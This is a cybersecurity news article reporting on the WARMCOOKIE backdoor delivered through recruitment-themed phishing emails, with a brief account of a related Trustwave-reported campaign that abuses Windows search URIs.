A new phishing campaign is haunting jobseekers in the latest report. Cybersecurity experts revealed that WARMCOOKIE can bypass networks by luring users into clicking recruitment-themed emails. This, in turn, will be the key to deploying more malicious payloads.
This campaign, tracked by Elastic Security Labs under the moniker REF6127, has a sinister capability to capture screenshots on top of its usual task of delivering extra malware.
WARMCOOKIE Backdoor Capabilities
WARMCOOKIE functions as an initial backdoor tool designed to infiltrate victim networks and deploy further malicious software.
Elastic Security Labs' researcher Daniel Stepanic explains that each WARMCOOKIE sample includes a hard-coded command-and-control (C2) IP address and RC4 encryption key. The backdoor is capable of:
Fingerprinting infected machines
Capturing screenshots
Deploying additional malware
Attack Chain and Delivery Mechanism
Since late April, the phishing campaign has used emails purporting to be from well-known recruitment firms such as Hays, Michael Page, and PageGroup. These emails urge recipients to click on a link to view job opportunities.
Once users click the link, they are prompted to solve a CAPTCHA challenge, which leads to the download of a JavaScript file named "Update_23_04_2024_5689382.js."
"This obfuscated script runs PowerShell, initiating the process to load WARMCOOKIE," notes Elastic. The PowerShell script exploits the Background Intelligent Transfer Service (BITS) to download the WARMCOOKIE backdoor.
How the Backdoor Emerges
A crucial component of this campaign is the use of compromised infrastructure to host the initial phishing URL. This URL redirects victims to the appropriate landing page, where the malicious payload is delivered. The WARMCOOKIE backdoor follows a two-step process to establish persistence:
Creating a scheduled task to ensure the backdoor runs continuously
Launching its core functionality after performing anti-analysis checks to evade detection
Similarities to Previous Campaigns
WARMCOOKIE's behavior resembles artifacts from a previous campaign codenamed Resident, which targeted manufacturing, commercial, and healthcare sectors. The backdoor can:
Read from and write to files
Execute commands using cmd.exe
Retrieve a list of installed applications
Capture screenshots
WARMCOOKIE Might Be New But it's Gaining Traction Already
Elastic Security Labs emphasizes that WARMCOOKIE is a newly discovered backdoor gaining traction in global phishing campaigns.
The disclosure of this campaign coincides with Trustwave SpiderLabs' report on another phishing campaign using invoice-related decoys and Windows search functionality embedded in HTML code to deploy malware.
Advanced Phishing Techniques
According to The Hacker News, phishing emails in this new campaign contain a ZIP archive with an HTML file. This file uses the legacy Windows "search:" URI protocol handler to display a Shortcut (LNK) file hosted on a remote server in Windows Explorer, making it appear as a local search result.
Clicking the LNK file triggers a batch script (BAT) hosted on the same server, potentially initiating further malicious actions.
Trustwave notes that it could not retrieve the batch script due to an unresponsive server. However, the misuse of search-ms: and search: as malware distribution vectors was previously documented by Trellix in July 2023.
The ongoing phishing campaign utilizing WARMCOOKIE is a sign that cybercriminals won't show any signs of slowing down when it comes to innovating new tactics to catch more victims off guard.
Attackers aim to infiltrate networks and deploy additional malicious payloads in this scheme. To avoid this from happening, stay away from untrusted links from suspicious sources.
In other news, the GTPDOOR Linux backdoor can expose your IP address. Without seeing any signs of attack, it can secretly infiltrate the mobile carrier network.